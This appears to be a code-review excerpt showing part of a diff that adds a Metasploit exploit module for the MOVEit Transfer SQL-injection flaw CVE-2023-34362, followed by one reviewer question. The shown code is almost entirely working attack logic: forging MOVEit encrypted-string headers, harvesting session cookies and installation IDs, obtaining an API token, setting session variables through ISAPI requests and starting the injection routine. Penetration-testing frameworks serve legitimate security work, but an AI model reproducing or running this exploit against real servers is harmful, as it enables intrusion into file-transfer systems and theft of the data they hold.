modules/exploits/windows/http/moveit_cve_2023_34362.rb

```diff
@@ -0,0 +1,471 @@
+    cipher.iv = iv
+    encrypted_data = cipher.update(data) + cipher.final
+    data_sha1_hash = Digest::SHA1.digest(data).unpack('C*')
+    org_key_sha1_hash = Digest::SHA1.digest(org_key).unpack('C*')
+
+    # MOVEit.DMZ.Core.Cryptography.Providers.MOVEit.MOVEitV2EncryptedStringHeader
+    header = [
+      225, # MOVEitV2EncryptedStringHeader
+      0,
+      data_sha1_hash[0],
+      data_sha1_hash[1],
+      org_key_sha1_hash[0],
+      org_key_sha1_hash[1],
+      org_key_sha1_hash[2],
+      org_key_sha1_hash[3],
+      iv.unpack('C*')[0],
+      iv.unpack('C*')[1],
+      iv.unpack('C*')[2],
+      iv.unpack('C*')[3],
+    ].pack('C*')
+
+    # MOVEit.DMZ.Core.Cryptography.Encryption
+    return tag + Base64.strict_encode64(header + encrypted_data)
+  end
+
+  def populate_token_instid
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'connection' => 'keep-alive',
+        'accept' => '*/*'
+      })
+
+      @cookies = res.get_cookies
+      # Get the session id from the cookies
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find token from cookies!') unless @cookies =~ /ASP.NET_SessionId=([a-z0-9]+);/
+      @moveit_token = ::Regexp.last_match(1)
+      vprint_status("@moveit_token = #{@moveit_token}")
+
+      # Get the InstID from the cookies
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not find InstID from cookies!') unless @cookies =~ /siLockLongTermInstID=([0-9]+);/
+      @moveit_instid = ::Regexp.last_match(1)
+      vprint_status("@moveit_instid = #{@moveit_instid}")
+    end
+    true
+  end
+
+  def request_api_token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri('/api/v1/token'),
+      'Content-Type' => 'application/x-www-form-urlencoded',
+      'connection' => 'keep-alive',
+      'accept' => '*/*',
+      'vars_post' => {
+        'grant_type' => 'password',
+        'username' => datastore['LOGIN_NAME'],
+        'password' => datastore['PASSWORD']
+      }
+    })
+
+    fail_with(Msf::Exploit::Failure::Unknown, "Couldn't get API token (#{res.body})") if res.code != 200
+
+    token_json = JSON.parse(res.body)
+    vprint_status("Got API access token='#{token_json['access_token']}'.")
+    token_json
+  end
+
+  def set_session(token, session_hash)
+    session_vars = {}
+    session_index = 0
+    session_hash.each_pair do |k, v|
+      session_vars.store("X-siLock-SessVar#{session_index}", "#{k}: #{v}")
+      session_index += 1
+    end
+    isapi_request(token, 'session_setvars', session_vars)
+  end
+
+  def sqli(cookies, sql_payload)
+    # Set up a fake package in the session. The order here is important. We set these session
+    # variables one per request, so first set the package information, then switch over to a
+    # 'Guest' username to allow the CSRF/injection to work as expected. If we don't do this
+    # order the session will be cleared and the injection will not work.
+    set_session(cookies, {
```

Comment:
Just to confirm - does this set_session call need to perform the `isapi_request` every time or just once?